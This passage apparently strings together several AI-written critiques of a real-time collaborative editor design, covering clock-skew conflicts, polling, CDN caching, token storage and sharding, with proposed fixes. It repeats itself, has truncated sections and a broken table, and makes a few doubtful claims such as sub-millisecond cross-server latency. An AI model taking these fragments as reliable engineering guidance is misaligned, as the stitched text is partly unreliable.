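    this.maxBatch = maxBatch;
    this.pending = [];
  }
  push(op) {
    this.pending.push(op);
    if (this.pending.length >= this.maxBatch) this.flush();
  }
  flush() {
    if (this.pending.length === 0) return;
    const batch = this.pending;
    this.pending = [];
    this.persist(batch); // one DB round-trip for many keystrokes
  }
}
```

The trade-off is the usual one for write-behind: anything still in `pending` when a server dies is lost, which is why the pub/sub or WAL layer, not Postgres, must see each op first.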
This architecture contains several critical flaws that would prevent it from functioning as a usable real-time collaborative editor. While it resembles a standard CRUD application, real-time collaboration requires specific handling of concurrency, state, and latency that this design violates.
Here is the breakdown of failure modes, race conditions, and bottlenecks, categorized by domain.
- Store granular operations (e.g., `insert at index 5`, `delete 3 chars`) rather than state snapshots, and apply operations sequentially.
- Set `Cache-Control: no-store` for document API endpoints.
- An XSS payload can read `localStorage` and steal the JWT; the attacker can then impersonate the user for 24 hours.
- Cookie-based auth needs CSRF protection (`SameSite` cookies mitigate most of this) and requires the backend to handle cookie parsing instead of header parsing.

This architecture contains several significant architectural flaws that would result in data loss, user frustration, and severe scaling limitations. While it mimics a general backend structure, it lacks the specific patterns required for collaborative editing.
Here is a detailed analysis of failure modes, race conditions, and bottlenecks, paired with specific solutions and trade-offs.
Failure Mode: Clock Skew & LWW Failure
Even a server-side timestamp will not guarantee total ordering without a unique transaction ID; attach a vector clock or sequence number to every change event.
Failure Mode: 2-Second Polling Latency
Publish each change to a per-document Redis channel (e.g., `doc:123:changes`). All Node.js API servers subscribe to this channel; when a server receives the message, it pushes it to its clients' WebSocket connections.
Failure Mode: Load Balancer Session Affinity Failure
Use a WebSocket gateway (e.g., a socket.io or ws proxy) that handles WebSocket routing. Implement Sticky Sessions (Session Affinity) on the LB (e.g., X-Real-IP based or cookie-based) so the LB routes a specific client IP to the same node. Alternatively, use a Pub/Sub backend (Redis) for WebSocket messages, decoupling the Node processes entirely.
Failure Mode: 30-Second Snapshot Interval
Failure Mode: CDN Caching API Responses
Endpoints like `GET /document/{id}` or `POST /document/{id}/save` are dynamic; caching them for 5 minutes means every user sees the same stale version of the document for up to 5 minutes. Set `Cache-Control: no-store` on all API endpoints. Move tokens from `localStorage` to HttpOnly cookies (to mitigate XSS), and use a short `max-age` for the JWT (e.g., 5 minutes) with a refresh token mechanism.
Failure Mode: Single DB Write Bottleneck
Partitioning by Organization ID (as planned) is good. Additionally, implement Database Connection Pooling and Asynchronous Writes (Batching).

| Issue | Risk Level | Priority | Recommended Fix |
|---|---|---|---|
| Conflict Resolution (LWW/HTML) | High | 1 | Switch to CRDTs (e.g., Yjs) and store JSON text chunks. |
| Sync Latency (2s Polling) | High | 1 | Redis Pub/Sub for cross-server message propagation. |
| LB/WS Compatibility | Medium | 2 | Sticky Sessions or WebSocket Gateway to maintain connection state. |
| CDN Caching API | High | 2 | Disable caching (no-store) for all API endpoints. |
| Auth (Local Storage) | Medium | 3 | Move to HttpOnly Cookies + Refresh Tokens. |
| Data Loss (30s Snapshots) | Low | 3 | Reduce interval to 10s; Use Client-side Buffering for immediate sync. |
Final Verdict: The proposed architecture is suitable for a simple "notes app" but not for a collaborative editor like Google Docs. The reliance on LWW + Client Clocks + HTML Snapshots creates a system that will inevitably lose work when two users collaborate. The architecture must be re-architected to use CRDT/OT logic, Redis Pub/Sub, and proper DB sharding to function acceptably.
This architecture is a common "MVP" design, but it contains several critical flaws that would prevent it from functioning as a true real-time collaborative editor (like Google Docs) under load. The most severe issues relate to data integrity (sync strategy) and real-time consistency (network topology).
Here is a detailed breakdown of the failure modes, race conditions, and bottlenecks, with specific solutions and trade-offs.
- Set `Cache-Control: no-cache, must-revalidate` for document endpoints. Alternatively, use ETags and validate against the server on every request.
- Shard on a composite key `(OrgID + UserID)` or use a dynamic sharding key. Implement a "hot shard" detection mechanism to move documents to less loaded shards.
- Issue auth via `Set-Cookie` with `HttpOnly`, `Secure`, and `SameSite=Strict` flags. Do not rely on LocalStorage for auth tokens.

| Component | Current Design | Recommended Design | Primary Benefit |
|---|---|---|---|
| Sync Logic | Client Timestamps (LWW) | CRDTs / OT with Server Clocks | Prevents data loss and race conditions. |
| Real-Time | Polling DB (2s) | Redis Pub/Sub between servers | Sub-millisecond latency across servers. |
| Load Balancer | Round-Robin | Sticky Sessions or Redis State | Maintains WebSocket connection affinity. |
| Persistence | Snapshot every 30s | Batched Writes (Redis -> Postgres) | Reduces DB load; near-zero data loss. |
| CDN | Caches API (5m) | No-Cache for Doc Endpoints | Ensures users see latest edits immediately. |
| Auth | LocalStorage JWT | HttpOnly Cookies | Prevents XSS token theft. |
The current architecture is suitable for a single-user document editor or a read-only CMS, but it will fail for a collaborative editor. The combination of Client Timestamps and Polling makes true collaboration impossible, and the CDN Caching contradicts the real-time requirement.
To make this viable, you must decouple the real-time protocol from the persistence layer and implement a proven consensus algorithm (OT/CRDT) for conflict resolution.
This architecture contains several critical flaws that would prevent it from functioning as a reliable real-time collaborative editor. While the component choices (React, Node, Postgres, Redis) are standard, the integration patterns and synchronization strategies are fundamentally broken for this use case.
Here is a detailed analysis of the failure modes, race conditions, and bottlenecks, along with specific solutions.
- Represent edits as operations (e.g., `insert char 'a' at index 5`). The server (or a dedicated sync service) transforms these operations against concurrent operations to ensure convergence.
- Publish updates to a per-document channel (e.g., `doc:{id}:updates`). All other API servers subscribe to this channel and instantly broadcast the update to their local WebSocket clients.
- Set `Cache-Control: no-store` or `private` for all dynamic API endpoints serving document content. Use the CDN only for the initial application shell.
- Store the token in an `HttpOnly`, `Secure`, `SameSite=Strict` cookie. The browser sends it automatically; JavaScript cannot access it. Trade-off: CSRF defenses are needed (`SameSite` handles most cases), and the API and frontend must share a domain or handle cross-origin cookie policies carefully.
- Partition by `DocumentID` (hashed) or use a managed cloud database that handles auto-scaling storage/compute independently of logical tenancy. Use Row-Level Security (RLS) in Postgres for data isolation rather than physical partitioning.

| Component | Current Flawed Approach | Recommended Robust Approach |
|---|---|---|
| Sync Logic | Last-Write-Wins (Client Time) | CRDTs or Operational Transformation (OT) |
| Inter-Server Sync | Poll DB every 2s | Redis Pub/Sub for instant broadcast |
| DB Writes | Write every keystroke | Write-Behind Batching (Memory/Redis -> DB) |
| Storage Format | Full HTML Snapshots | Operation Log (Event Sourcing) |
| Caching | Cache API (5 min) | No Cache for dynamic data; CDN for static assets only |
| Auth Storage | LocalStorage | HttpOnly Cookies |
| Load Balancing | Round-Robin | Sticky Sessions for WebSockets |
| Scaling Unit | Partition by Org ID | Partition by Doc ID or Managed Cloud DB |
The current architecture will result in data loss, visible lag, and security vulnerabilities under any realistic load. The shift from "snapshot-based LWW" to "operation-based CRDT/OT" with "Redis-backed pub/sub" is the most critical pivot required to make this system viable.
Below is a structured breakdown of all flaws in the architecture, categorized by type, with specific, actionable solutions and their inherent tradeoffs:
| Issue Description | Solution | Tradeoffs |
|---|---|---|
| Client clock skew breaks LWW conflict resolution: Raw client wall clocks can be minutes/hours off, leading to stale changes overwriting newer ones, or offline edits being permanently discarded when a client reconnects. | Replace client timestamps with Hybrid Logical Clocks (HLC), which combine physical time with distributed logical counters to enforce a causal order of edits even with clock skew. For offline support, layer in CRDTs (Conflict-Free Replicated Data Types) to merge edits regardless of arrival order. | HLC adds tiny metadata overhead per edit. CRDTs add frontend/backend state management complexity and marginally higher bandwidth usage, but eliminate data loss from conflicts. |
| Write-write races in Postgres: Two API servers receiving concurrent edits for the same document may interleave writes, causing the newer edit to be overwritten by a stale one, even with correct timestamps. | Implement optimistic concurrency control (OCC) in Postgres: add a version number column to documents that increments on every write. A write only succeeds if the server’s local version matches the database’s current version; failed writes trigger a retry with the latest state. | OCC avoids locking overhead but can lead to rare retries under extreme contention for a single popular document. |
| Stale initial client state: A user may fetch a document snapshot via HTTP, then have edits occur between that fetch and their WebSocket connection becoming active, leaving them permanently out of sync. | On WebSocket handshake, the server sends the document’s current version number. The client compares this to the snapshot’s version; if mismatched, it pulls all intermediate edits to catch up before applying new local changes. | Adds minor lookup overhead for new connections, but eliminates split-brain client state. |
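The Hybrid Logical Clock suggested in the first row can be sketched compactly. This follows the standard HLC update rules; the class shape and an injectable wall clock are my assumptions:

```javascript
// Hybrid Logical Clock: timestamps are (physical, logical) pairs that
// always advance, even when the local wall clock lags behind
// timestamps seen from peers.
class HLC {
  constructor(now = () => Date.now()) {
    this.now = now;
    this.pt = 0; // last physical component
    this.lc = 0; // logical counter, breaks ties within one pt
  }
  tick() { // local event or send
    const wall = this.now();
    if (wall > this.pt) { this.pt = wall; this.lc = 0; }
    else this.lc += 1;
    return [this.pt, this.lc];
  }
  recv([rpt, rlc]) { // merge a timestamp received from a peer
    const wall = this.now();
    const pt = Math.max(wall, this.pt, rpt);
    if (pt === this.pt && pt === rpt) this.lc = Math.max(this.lc, rlc) + 1;
    else if (pt === this.pt) this.lc += 1;
    else if (pt === rpt) this.lc = rlc + 1;
    else this.lc = 0;
    this.pt = pt;
    return [this.pt, this.lc];
  }
}
```

Comparing `(pt, lc)` pairs lexicographically gives an order that respects causality: an edit stamped after receiving a peer's edit always sorts later, regardless of clock skew.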
| Issue Description | Solution | Tradeoffs |
|---|---|---|
| Cross-server sync latency + polling waste: The current 2-second Postgres polling by all API servers creates multi-second lag for users on different servers, and generates unsustainable read load as you scale API servers. | Add a lightweight Redis Pub/Sub broker for inter-server communication: when a server processes an edit, it writes to Postgres then publishes the edit to a channel for that document. All API servers subscribe to relevant document channels and broadcast edits to their local clients instantly. | Adds a new dependency that requires high availability. Redis Pub/Sub offers at-most-once delivery, so Postgres remains the source of truth for clients that miss transient messages. |
| 30-second snapshot window causes data loss: If an API server crashes between snapshot saves, all edits from that 30-second window are permanently lost. Idle documents also waste write throughput on unnecessary snapshots. | Append all edits to a persistent Redis write-ahead log (WAL) immediately before broadcasting. Only write full Postgres snapshots when a document is edited, or every 5 minutes (whichever comes first), and purge WAL entries once merged into a snapshot. | Adds small per-edit write overhead to Redis, but reduces the data loss window to <1s and eliminates wasted writes for idle documents. Requires WAL TTLs to avoid unbounded Redis growth. |
| JWTs in localStorage are vulnerable to XSS theft: Storing 24-hour JWTs in localStorage exposes them to theft via cross-site scripting, enabling full account takeover. JWTs also cannot be revoked early if a user logs out or their account is compromised. | Replace client-side JWTs with server-side sessions: store a cryptographically secure session ID in an HttpOnly, Secure, SameSite cookie (inaccessible to JS). Add short-lived access tokens (15-minute TTL) and a Redis blocklist for revoked tokens to enable early revocation. | Adds CSRF protection requirements (easily mitigated with standard CSRF tokens) and minor Redis lookup overhead per request, but eliminates XSS-based session theft. |
| CDN caches dynamic mutable data: Caching all API responses for 5 minutes leads to stale document content for all users, as edits are not reflected until the cache expires. | Disable caching for all dynamic API routes (add Cache-Control: no-store headers). Only cache static React assets (JS bundles, images) on CloudFront, with build-time content hashes to avoid serving stale frontend code after deployments. | Loses caching benefits for dynamic data, which is irrelevant for frequently changing user-specific content. Hashed static assets still retain all CDN performance benefits. |
| API server crashes drop all connected clients: A failing API server takes all its active WebSocket connections with it, leading to dropped edits and disconnected users. | Add client-side exponential backoff reconnection logic, and sticky sessions on the load balancer to keep users connected to a stable server for the duration of their session. Persist all in-flight edits to the shared Redis WAL so they are not lost if a server crashes mid-processing. | Sticky sessions can cause minor load imbalance, mitigated by assigning new connections only to servers under their per-instance connection limit (e.g., 10,000 concurrent WebSockets). |
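The client-side exponential backoff mentioned in the last row is usually combined with "full jitter" so a fleet of disconnected clients does not retry in lockstep. A sketch with illustrative base/cap values:

```javascript
// Full-jitter exponential backoff for WebSocket reconnects: the delay
// ceiling doubles each attempt (capped), and the actual delay is drawn
// uniformly from [0, ceiling) to spread out the reconnection storm.
function reconnectDelayMs(attempt, baseMs = 250, capMs = 30_000,
                          rand = Math.random) {
  const ceiling = Math.min(capMs, baseMs * 2 ** attempt);
  return rand() * ceiling;
}
```

A client would call this with an attempt counter that resets to zero after a successful reconnect.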
| Issue Description | Solution | Tradeoffs |
|---|---|---|
| Org-only document partitioning creates hot shards: Partitioning only by organization ID leads to overloaded database shards for large enterprises with thousands of active documents, or viral global documents edited by 100k+ concurrent users. | Add a secondary partitioning layer: split large organizations’ documents across multiple shards by document ID. Track hot shards automatically and rebalance them across cluster nodes to spread load. For ultra-popular documents, shard edit broadcast streams across multiple Redis instances. | Adds complexity to the data routing layer, which must track document locations across shards. Rebalancing adds minor operational overhead, but eliminates single-shard overload. |
| Unlimited WebSocket connections overwhelm API servers: Without connection limits, a small number of API servers can end up with hundreds of thousands of concurrent WebSockets, leading to slow broadcast times and dropped connections. | Enforce per-instance connection limits, and implement auto-scaling for API servers that spins up new instances when the average connection count across the fleet crosses 70% of the per-instance limit. Add scale-down cooldowns to avoid thrashing during temporary load spikes. | Auto-scaling can lead to minor over-provisioning during transient spikes, but ensures no server is overwhelmed. |
| Single-point-of-failure Redis cache: A standalone Redis instance for sessions can crash, taking all active user sessions with it, and cannot scale to millions of concurrent users. | Run Redis in cluster mode with replication and AOF persistence to avoid data loss. Shard sessions and WAL data across multiple Redis nodes to spread load. | Adds operational overhead to manage a Redis cluster, but eliminates the single point of failure and scales to millions of users. |
| Postgres read load from polling grows linearly with API servers: Even with read replicas, 500 queries per second from 1000 API servers polling every 2s overwhelms replica capacity. | The same Redis Pub/Sub solution used to fix cross-server latency eliminates 99% of Postgres polling load. Only clients that reconnect or miss messages need to query Postgres for missed edits, reducing read load to a small fraction of its prior level. | The only tradeoff is the operational overhead of managing the Redis Pub/Sub layer, which is far lower than scaling Postgres replicas to support polling. |
| Failure / Race Condition | Why it happens in the current design | Concrete mitigation (trade‑offs) |
|---|---|---|
JWT stored in localStorage – vulnerable to XSS, copy‑and‑paste attacks, and malicious extensions. | No HTTP‑Only flag, no SameSite/Lax cookie protection. | Move JWT to an HttpOnly, SameSite‑Lax cookie (or use a secure “session‑store” backed by Redis). <br>Pros: eliminates client‑side token theft. <br>Cons: requires cross‑origin cookie handling, possible CORS headaches, and a small added latency for cookie‑based auth. |
| 24‑hour token expiry – stale tokens can be reused after logout or revocation. | Long‑lived access token, no refresh‑token flow. | Introduce short‑lived access tokens (≤ 5 min) + refresh‑token endpoint that issues new JWTs. Store refresh tokens in Redis with revocation list. <br>Pros: immediate revocation possible, tighter security. <br>Cons: extra round‑trip for each user activity, higher auth‑server load. |
| Session cache in Redis – single point of failure, possible data loss on crash. | No persistence configured; if Redis restarts, sessions disappear. | Enable Redis persistence (RDB + AOF) and run a Redis cluster with synchronous replication. Optionally keep a lightweight “session‑store” in PostgreSQL for critical sessions. <br>Pros: durability, fail‑over. <br>Cons: write latency + storage cost; need to manage TTL consistency across nodes. |
| Token revocation not propagated – a server that crashes may still have a revoked token in memory. | Revocation list is in‑memory only; no broadcast mechanism. | Publish revocation events to a durable pub/sub (e.g., Kafka/Redis Streams) that all API nodes consume before each request. <br>Pros: guarantees revocation is respected across all servers. <br>Cons: adds latency to auth checks, extra infra. |
| WebSocket handshake lacks auth verification – a malicious client could open a connection with a stolen token. | JWT is only sent after connection, not validated on handshake. | Validate JWT on the WebSocket upgrade request (e.g., Sec-WebSocket-Protocol or a query param) and reject if invalid or revoked. <br>Pros: prevents unauthorized connections early. <br>Cons: adds extra CPU on each upgrade, must handle token revocation in the same flow. |
| Failure / Race Condition | Why it happens | Mitigation (trade‑offs) |
|---|---|---|
| Round‑robin load balancer without sticky sessions – a client may reconnect to a different API server after a network hiccup and miss recent changes. | Load balancer distributes WebSocket connections arbitrarily. | Enable sticky (session‑affinity) at the L4/L7 layer (e.g., source‑IP, cookie‑based). Or use a shared broadcast bus (Redis Pub/Sub, NATS, Kafka) that any server can publish to and all servers can subscribe, eliminating the need for stickiness. <br>Pros (sticky): simple, no extra infra. <br>Cons (sticky): uneven load, hot‑spot servers. <br>Pros (shared bus): true cross‑server sync, easier scaling. <br>Cons: added latency, need to guarantee delivery (persistent queue). |
| Polling every 2 s from each server – high DB load, poll‑storms, and possible missed updates if a poll interval overlaps a write. | Each server runs a separate poll, leading to N × poll‑frequency DB queries. | Replace polling with PostgreSQL LISTEN/NOTIFY (or logical replication) that pushes changes to a single channel. Or use a dedicated change‑stream service (Kafka, Pulsar) that all servers subscribe to. <br>Pros: eliminates polling overhead, near‑real‑time. <br>Cons: LISTEN/NOTIFY is limited to a single DB node; need a broker for multi‑region. |
| Broadcast only to clients on the same server – other servers never see changes, causing split‑brain. | Broadcast is local to the server that wrote the change. | Centralized pub/sub (Redis, Kafka) that all API servers publish to and all servers subscribe to. Include a document‑ID + change‑ID in each message to guarantee ordering. <br>Pros: full visibility across the cluster. <br>Cons: requires a reliable message broker, adds a hop latency. |
| Duplicate broadcast when a server recovers – after a crash, the same change may be re‑broadcast. | No deduplication on server side. | Assign a monotonically increasing per‑document sequence number (or UUID) on the DB write; broadcast only if the sequence number is newer than the last seen by the server. Use a persistent broadcast log (e.g., a “change‑queue” table) that the server reads on startup to catch missed messages. <br>Pros: eliminates duplicate messages. <br>Cons: extra write on each change, need to purge logs. |
| Last‑write‑wins based on client timestamps – clock skew leads to lost updates and non‑deterministic ordering. | Relying on client clocks for conflict resolution. | Server‑provided version vectors (e.g., doc_version, row_version incremented atomically) or CRDT/OT libraries (Yjs, Automerge). Use a conflict‑resolution service that merges operations deterministically. <br>Pros: robust, no lost edits. <br>Cons: higher CPU per change (OT/CRDT merge), added state to store. |
| Broadcast failure → client never receives change – server may crash after DB commit but before publishing. | Broadcast is done after DB write, not inside a transaction. | Publish to the message bus inside the same DB transaction (or use a 2‑phase commit pattern). Alternatively, persist broadcast events in an “outbox” table and have a background worker replay missed messages. <br>Pros: guaranteed delivery. <br>Cons: transaction latency, extra writes, complexity. |
| Client sends duplicate changes – network retransmission or reconnection may cause the same edit to be applied twice. | No change‑ID deduplication on client side. | Client includes a unique change_id (UUID) and a client_seq number; server checks for duplicates before persisting. <br>Pros: prevents double‑apply. <br>Cons: requires extra memory on server to store recent IDs. |
| WebSocket reconnection storm – many clients reconnect simultaneously after a brief outage, overwhelming servers. | No exponential back‑off or rate limiting on reconnection. | Exponential back‑off with jitter on client side; circuit‑breaker on server side (e.g., limit new connections per second). <br>Pros: smooths load spikes. <br>Cons: may delay recovery for some users. |
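The reconnection guidance above can be sketched in a few lines of client code. This is a minimal TypeScript illustration of full-jitter exponential backoff; `connect` is a placeholder for the real WebSocket dial, not part of the architecture described.

```typescript
// Full-jitter exponential backoff: delay is uniform in [0, min(cap, base * 2^attempt)).
// Spreading reconnects over the whole window prevents synchronized thundering herds.
function backoffDelay(attempt: number, baseMs = 500, capMs = 30_000): number {
  const ceiling = Math.min(capMs, baseMs * 2 ** attempt);
  return Math.random() * ceiling;
}

// Hypothetical reconnect loop; `connect` stands in for the real WebSocket dial.
async function reconnectWithBackoff(
  connect: () => Promise<void>,
  maxAttempts = 8,
): Promise<boolean> {
  for (let attempt = 0; attempt < maxAttempts; attempt++) {
    try {
      await connect();
      return true;
    } catch {
      await new Promise((r) => setTimeout(r, backoffDelay(attempt)));
    }
  }
  return false;
}
```

A jittered window matters as much as the exponential growth: without jitter, all clients that dropped together retry together.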
| Failure / Race Condition | Why it happens | Mitigation (trade‑offs) |
|---|---|---|
| Concurrent edits to the same paragraph – last‑write‑wins discards earlier edits. | No per‑paragraph version tracking, just whole‑doc timestamps. | Implement per‑paragraph vector clocks (or use a CRDT for the paragraph). When a change arrives, compare its vector with the stored version; merge if possible, otherwise apply deterministic rule (e.g., “first wins”). <br>Pros: preserves edits, no data loss. <br>Cons: increased write latency, extra storage for vector clocks. |
| Write‑ahead log (WAL) replication lag – read replicas may serve stale content, leading to “ghost” edits. | Read replicas are used for read‑heavy operations; they lag behind primary. | Route read‑after‑write operations to the primary (or a “read‑after‑write” pool). Use session‑affinity for reads of a document that was just edited. <br>Pros: strong consistency for the most recent change. <br>Cons: higher load on primary, need to balance read‑only traffic. |
| Snapshot generation (full HTML every 30 s) race with real‑time edits – a snapshot may capture a partially applied change set, causing inconsistency. | Snapshot runs independently of change stream. | Take snapshots after a batch of changes is flushed to the outbox or after a stable document version is published. Use a “snapshot lock” (row‑level lock) to prevent new edits while snapshot is taken, or use incremental diffs (store only changes). <br>Pros: atomic snapshot, less storage. <br>Cons: lock contention or extra CPU for diff generation. |
| Document partitioning only by org ID – a large org may concentrate all traffic on one DB node, causing hot‑spots. | Partitioning key is coarse; all docs for the same org share the same shard. | Add a second shard key (e.g., org_id + doc_id or a hash of doc_id) and use consistent hashing for routing. <br>Pros: distributes load more evenly. <br>Cons: more complex routing logic, need to keep mapping in cache. |
| Read‑replica lag causing “lost edit” on client – client reads from replica, then sees its own edit as missing. | Client reads from replica immediately after sending change. | Prefer the primary for reads of the same document within a short window (e.g., 2 s). Or publish a “read‑after‑write” flag in the change message that tells the client to wait for broadcast before re‑reading. <br>Pros: avoids stale reads. <br>Cons: may increase latency for reads; needs extra coordination. |
| Snapshot storage overflow – full HTML snapshots can become huge, exhausting disk. | No compression, no retention policy. | Compress snapshots (gzip/brotli) and store them in a separate object‑store (S3, GCS). Keep only N recent snapshots (e.g., last 5 minutes) and purge older ones. <br>Pros: reduces storage cost, still provides point‑in‑time recovery. <br>Cons: extra CPU for compression, need to manage lifecycle. |
| Version history not persisted – undo/redo impossible; audit logs missing. | Only current snapshot stored. | Create a doc_changes table that records each operation (type, content, user, timestamp, vector clock). Use this for undo/redo, audit, and conflict resolution. <br>Pros: richer history, easier debugging. <br>Cons: extra write load, storage growth. |
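Several rows above lean on per-paragraph vector clocks. A minimal TypeScript sketch of the compare/merge logic (the keys such as `u1` are arbitrary client IDs, chosen only for illustration):

```typescript
type VectorClock = Record<string, number>;

// Compare two vector clocks. "concurrent" means neither edit saw the other,
// so a merge rule (CRDT/OT or a deterministic tiebreak) is required;
// "before"/"after" means the edits are causally ordered and can be applied directly.
function compareClocks(
  a: VectorClock,
  b: VectorClock,
): "before" | "after" | "concurrent" | "equal" {
  const keys = new Set([...Object.keys(a), ...Object.keys(b)]);
  let aAhead = false;
  let bAhead = false;
  for (const k of keys) {
    const av = a[k] ?? 0;
    const bv = b[k] ?? 0;
    if (av > bv) aAhead = true;
    if (bv > av) bAhead = true;
  }
  if (aAhead && bAhead) return "concurrent";
  if (aAhead) return "after";
  if (bAhead) return "before";
  return "equal";
}

// Merge takes the element-wise max, producing a clock that dominates both inputs.
function mergeClocks(a: VectorClock, b: VectorClock): VectorClock {
  const out: VectorClock = { ...a };
  for (const [k, v] of Object.entries(b)) out[k] = Math.max(out[k] ?? 0, v);
  return out;
}
```

The storage cost noted in the table is visible here: one counter per participating client, per paragraph.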
| Bottleneck | Why it occurs | Mitigation (trade‑offs) |
|---|---|---|
| WebSocket connections per API server – memory/CPU grows linearly with active users; a single server can saturate. | Each server holds its own ws connections; no shared broker for cross‑server broadcast. | Offload real‑time messaging to a dedicated message broker (Redis Pub/Sub, NATS JetStream, Kafka). API servers only publish/subscribe, reducing per‑server memory. <br>Pros: horizontal scaling of WS servers independent of message broker. <br>Cons: added hop latency, need to guarantee delivery. |
| DB write volume – every keystroke results in a row insert (or update) → high contention on the same document row. | No batching, no debounce. | Debounce client edits on the server (e.g., coalesce changes per document for ≤ 200 ms) before persisting. Use optimistic concurrency (UPDATE … WHERE version = X). <br>Pros: reduces write traffic, less lock contention. <br>Cons: introduces slight client‑side latency, need to handle “late” client messages. |
| Polling load – N × 2 s queries per server. | Polling is naive. | LISTEN/NOTIFY (or change‑stream) pushes changes only when they happen. <br>Pros: near‑zero polling load. <br>Cons: requires a single DB node to push notifications; for multi‑region you need a broker. |
| Redis session cache – single‑node bottleneck, potential OOM under massive concurrent connections. | No clustering or persistence. | Run Redis as a cluster with sharding (or use a managed service with auto‑scaling). Enable AOF for durability. <br>Pros: horizontal scaling, resilience. <br>Cons: added network hops, need to keep keys consistent across shards. |
| CDN caching of API responses – 5‑minute cache can serve stale content (e.g., auth, document metadata). | Cache‑Control headers set to public for dynamic endpoints. | Set Cache‑Control: no‑store or private for all auth and document‑state endpoints. For static assets (e.g., UI bundles) keep the 5‑min cache. <br>Pros: eliminates stale data. <br>Cons: increases CDN load, slightly higher latency for unchanged responses. |
| Load‑balancer health‑checks for WebSocket – L7 health checks may close idle connections, causing unexpected reconnects. | Health‑checks use HTTP GET, not WS ping. | Configure L4 TCP health checks or add a dedicated /health endpoint that sends a WebSocket ping and expects a pong. <br>Pros: keeps connections alive. <br>Cons: more complex LB config. |
| Hot‑spotting on a single organization – if one org has many docs, all traffic lands on the same DB shard. | Partitioning only by org ID. | Hybrid sharding: first by org, then by a hash of doc ID (or use a consistent‑hash ring). <br>Pros: spreads load across shards. <br>Cons: requires a lookup table for routing. |
| Read‑replica lag under heavy writes – read traffic may see stale data. | Reads routed to replicas. | Read‑after‑write routing: for a given document, the first read after a write goes to primary; subsequent reads can use replicas. Use a “read‑after‑write” flag in the change message. <br>Pros: improves consistency without sacrificing read scalability. <br>Cons: primary load spikes, need to track per‑doc read‑after‑write windows. |
| Server‑side broadcast storm – many servers broadcast the same change, causing duplicate messages. | No deduplication across servers. | Publish to a single, durable channel (e.g., Kafka topic per document). Each server consumes the topic; duplicates are filtered by change ID. <br>Pros: eliminates cross‑server duplication. <br>Cons: adds broker dependency and latency. |
| Snapshot generation CPU intensive – compressing large HTML on every 30 s interval. | No throttling, no async processing. | Run snapshot generation in a background worker pool (e.g., separate Node/Go service) that picks up pending snapshots from a queue. <br>Pros: isolates heavy work from request path. <br>Cons: added queue latency, need to guarantee ordering. |
| WebSocket reconnection storms – all clients reconnect at once after a brief outage, overwhelming the server. | No exponential back‑off, no rate limiting. | Exponential back‑off + jitter on client side; circuit‑breaker on server side (e.g., reject new connections above a threshold, queue them). <br>Pros: protects server, smooths load. <br>Cons: may delay reconnection for some users. |
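The debounce/coalesce idea from the DB-write-volume row can be sketched as a small in-memory coalescer. `flushPending()` is assumed to be driven by a timer (e.g., every 200 ms), which is left out here; the field names are illustrative.

```typescript
interface Edit {
  docId: string;
  content: string;
  seq: number; // server-assigned, monotonically increasing per document
}

// Coalesce per-document edits in memory; flushPending() returns one row per
// document instead of one row per keystroke, cutting write volume under
// fast typing at the cost of a small persistence delay.
class EditCoalescer {
  private pending = new Map<string, Edit>();

  submit(edit: Edit): void {
    const prev = this.pending.get(edit.docId);
    // Keep only the newest edit per document within the window.
    if (!prev || edit.seq > prev.seq) this.pending.set(edit.docId, edit);
  }

  flushPending(): Edit[] {
    const batch = [...this.pending.values()];
    this.pending.clear();
    return batch;
  }
}
```

Note the trade-off called out in the table: anything still in `pending` when the process dies is lost, which is why this is usually paired with a durable buffer (e.g., Redis AOF) or a short window.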
| Issue | Why it matters | Mitigation (trade‑offs) |
|---|---|---|
| No end‑to‑end latency monitoring – you cannot detect when a change takes > X ms to reach all clients. | Real‑time editing requires tight latency (< 200 ms). | Instrument every change path: DB write → broadcast → client receipt. Export metrics to Prometheus/Grafana (histogram of change‑latency). <br>Pros: early detection of bottlenecks. <br>Cons: extra instrumentation code, need to aggregate across servers. |
| Missing health‑checks for WebSocket – LB may think a server is healthy while it cannot accept new WS connections. | LB health‑checks use HTTP only. | Add a WS ping endpoint (/ws/health) that returns pong; configure LB to probe it. <br>Pros: accurate health detection. <br>Cons: extra endpoint, potential false positives if ping latency spikes. |
| No dead‑letter queue for broadcast failures – messages that cannot be delivered are dropped silently. | A crashed client or network glitch may cause loss of edits. | Persist broadcast events in an “outbox” table and have a background worker retry. When a client finally connects, it can request missed changes. <br>Pros: guarantees no edit is lost. <br>Cons: extra DB writes, storage for outbox. |
| No automated rollback for snapshot failures – if snapshot generation crashes, the system may lose recent state. | Snapshot is used for point‑in‑time recovery. | Implement a retry loop with exponential back‑off and a fallback to the latest DB row if snapshot fails. Log the failure and alert ops. <br>Pros: ensures continuity. <br>Cons: added retry latency, need to handle partial snapshots. |
| Lack of distributed tracing – you cannot see which component (client → API → WS → DB) is slow. | Complex asynchronous flow makes debugging hard. | Add OpenTelemetry tracing on each hop (client SDK, API middleware, WS server, DB driver). Correlate change_id across services. <br>Pros: pinpoint latency spikes. <br>Cons: overhead on every request, need to propagate trace context across async boundaries. |
| No automated scaling thresholds – you may add servers manually when load spikes. | Manual scaling leads to outages. | Set autoscaling rules based on WebSocket connection count, DB write latency, Redis memory usage, and CPU. Use Kubernetes HPA or cloud‑native autoscaling groups. <br>Pros: reacts quickly to load. <br>Cons: may over‑scale during transient spikes; need cost‑aware policies. |
| No graceful degradation for CDN failures – if CloudFront edge nodes are down, static assets may be unavailable. | CDN is critical for UI bundles. | Serve static assets from a secondary origin (e.g., S3) with fallback; configure CloudFront to use origin‑failover. <br>Pros: ensures asset availability. <br>Cons: added origin load, possible duplicate content. |
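The outbox pattern mentioned for broadcast failures can be illustrated with an in-memory sketch. In a real deployment the events table lives in PostgreSQL (written in the same transaction as the change) and `publish` is a broker producer call; both are simulated here.

```typescript
interface OutboxEvent {
  id: number;
  docId: string;
  payload: string;
  published: boolean;
}

// Transactional-outbox sketch: the change and its outbox event are recorded
// together, and a background worker publishes pending events, marking them
// only after the broker acknowledges. A crash between write and publish
// loses nothing: the event is still pending on restart.
class Outbox {
  private events: OutboxEvent[] = [];
  private nextId = 1;

  recordChange(docId: string, payload: string): void {
    this.events.push({ id: this.nextId++, docId, payload, published: false });
  }

  // `publish` stands in for the real broker call (e.g., a Redis/Kafka producer);
  // returning false simulates a delivery failure to be retried on the next drain.
  drain(publish: (e: OutboxEvent) => boolean): number {
    let sent = 0;
    for (const e of this.events) {
      if (!e.published && publish(e)) {
        e.published = true;
        sent++;
      }
    }
    return sent;
  }
}
```

A purge job for published rows (the "extra DB writes, storage for outbox" cost in the table) is omitted.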
| Failure / Race Condition | Why it occurs | Mitigation (trade‑offs) |
|---|---|---|
